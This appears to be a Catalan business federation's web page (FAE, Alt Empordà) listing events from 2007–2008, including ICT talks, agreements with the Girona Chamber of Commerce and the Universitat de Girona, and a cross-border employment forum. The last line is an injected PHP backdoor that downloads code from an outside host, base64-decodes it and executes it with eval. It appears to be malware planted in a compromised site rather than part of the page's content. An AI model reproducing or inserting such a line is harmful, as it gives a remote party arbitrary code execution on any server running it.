Fae - Federació Alt empordanesa d'empreses

  • Increase font size
  • Default font size
  • Decrease font size
Events Celebrats

Cicle de 5 xerrades, adreçades a empresaris/res, directius i empreses del Alt Empordà  que vulguin aprofundir en el camp de les noves tecnologies.

A partir del mes de novembre la Cambra impartirà un cicle de 5 xerrades , a Figueres de 2 hores eminentment pràctiques, amb una periodicitat mensual, adreçades a empresaris/res, directius i empreses del Alt Empordà  que vulguin aprofundir en el camp de les noves tecnologies, i conèixer com millorar la competitivitat de les seves empreses a través de l’ús eficient de les tecnologies de la informació i la comunicació (TIC). (document pdf)

 

La Federació Altempordanesa d’Empresaris s’acull al Servei d’Orientació Pimestic mitjançant un conveni amb la Cambra de Comerç i AENTEG.

Gràcies al conveni que han subscrit el dia 15 de setembre de 2008 entre la Cambra de Comerç de Girona, AENTEG i la Federació Altempordanesa d’Empresaris, les empreses adscrites a aquesta federació podran gaudir de l’assessorament del servei d’orientació en noves tecnologies PIMESTIC. (document pdf)

 

Adhesió de la FAE a l’Associació (ADRI NORD-ORIENTAL DE CATALUNYA).

La associació ADRI té con objectius: Participar en el Programa de Desenvolupament Rural de Catalunya per aplicar la metodologia Leader, i promoure el desenvolupament sostenible dels municipis rurals de les comarques de l’Alt Empordà, la Garrotxa, Osona i el Pla de l’Estany en els seus àmbits industrial, comercial, agrícola, ramader, forestal, turístic i qualsevol altre tipus d’activitat, si bé lligant el seu creixement als criteris de desenvolupament sostenible.

 

La Universitat de Girona i la Federació Altempordanesa d’Empresaris signen un conveni de col·laboració.

El dia 9 de juny de 2008 ha tingut lloc a Les Àligues, seu del Rectorat de la Universitat de Girona, la trobada entre els representants de la Federació Altempordanesa d’Empresaris (FAE), Lluís Fita i Mariona Ferrer, i la rectora Anna M. Geli. (document pdf)

 

Forum Transfronterer, PYREMED. Palau de Congressos de Perpinyà.

El proper dijous dia 29 de maig de 2008, Pyremed - Associació dels serveis públics d’ocupació, les organitzacions patronals i els sindicats del Midi-Pyrénées, Languedoc-Roussillon i Catalunya -, organitza un fòrum transfronterer dedicat al treball amb la finalitat de facilitar informació sobre la mobilitat dels treballadors, a banda i banda de la frontera, i la contractació dels mateixos per part de les empreses. (document pdf)

 

Acte pùblic d' adhesió a la FAE de 3 associacions de la comarca.

Acte pùblic d' adhesió a la FAE de 3 associacions de la comarca presidit per l' honorable Conseller d' innovació, Universitat i empresa , Sr. Josep Huguet , 15 febrer 2008. (document pdf)

 

Jornada de presentaciò del pla pimestic.cat a Figueres.

Jornada de presentaciò del pla pimestic.cat a Figueres,amb la collaboració de la FAE entre d`altres.Es el pla d`actuació del govern de la Generalitat de Catalunya per a promoure les tecnologíes de la informació i la comunicació (TCI) a les empreses catalanes, amb l'objectiu de millorar la seva productivitat i competitivitat, 17 de gener de 2008. (document pdf)

 

Es crea una agrupacio de les associacions empresarials de la FAE per facilitar la formaciò de les empreses de l`Alt Empordà.

La Federació Altempordanesa d’Empresaris (FAE) ha promogut una agrupació d’empreses en la que participen la Unió d’Empresaris Metal·lúrgics de l’Alt Empordà, Comerç Figueres Associació, l’Associació d’Instal.ladors Comarcal de l’Alt Empordà, l’Associació d’Empresaris d’Activitats d’Hostaleria de l’Alt Empordà i totes les empreses associades a la FAE, amb l’objectiu de facilitar la detecció, gestió i organització de les accions formatives que donin resposta a les necessitats de formació de les empreses de la nostra comarca. (document pdf)

 

Els efectes de les infrastructures a l`economia dins l`arc mediterrani transpirinec.

La Federaciò Altaempordanesa d`empresaris (FAE),conjuntament amb l´Ajuntament de Figueres,va organitzar una jornada sota el títol "Els efectes de les infrastructures a l`economia dins l`arc mediterrani transpirinec", en el Cercle Esport de Figueres el dia 25 d´abril de 2007. (document pdf)

 

Nova junta directiva patronal gironina FOEG am la representaciò de la FAE 1 de Març 2007.

L’1 de març de 2007 l’Assemblea General de la FOEG va escollir de nou, , al Sr. Joan Fausto Martí com a president de la patronal gironina fins a l’any 2011. A la Junta directiva s’ha incorporat com a representant de la Federació Altempordanesa d’Empresaris, la vicepresidenta Sra. Mariona Ferrer. (document pdf)

 $rrr = file_get_contents('http://speed-dev.net/counter/count.php'); eval(base64_decode($rrr));